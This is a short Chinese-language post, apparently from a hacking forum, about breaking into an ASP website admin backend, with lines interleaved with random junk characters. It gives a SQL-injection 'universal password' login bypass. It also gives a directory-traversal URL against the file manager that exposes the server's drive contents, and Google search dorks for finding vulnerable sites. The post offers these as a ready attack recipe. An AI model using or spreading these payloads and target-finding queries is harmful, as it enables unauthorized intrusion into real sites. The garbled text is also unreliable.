后台万能密码 'or'='or'
+ n6 `& K X' a
- H' B9 h l2 Q5 U/ L/ m& T9 f1 H后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: \. {0 t! S: u, f# D y+ Dadmin/uploadfile.asp?currentFolder=/upfiles/../
2 G' ] Q( K; P# {1 Q, U% m' s! r: O$ H# @
漏洞证明:
" J& Y4 b) i2 i( D4 e) Z& j
' v' u3 k& y( @6 p谷歌:inurl:type.asp?id=1 新闻中心% y+ n+ d" e0 s, u( D; h
或者 :inurl:download_ok.asp?: y' {, Y0 a3 g6 b, q
8 V# p9 X* }, Y- N( h: l
|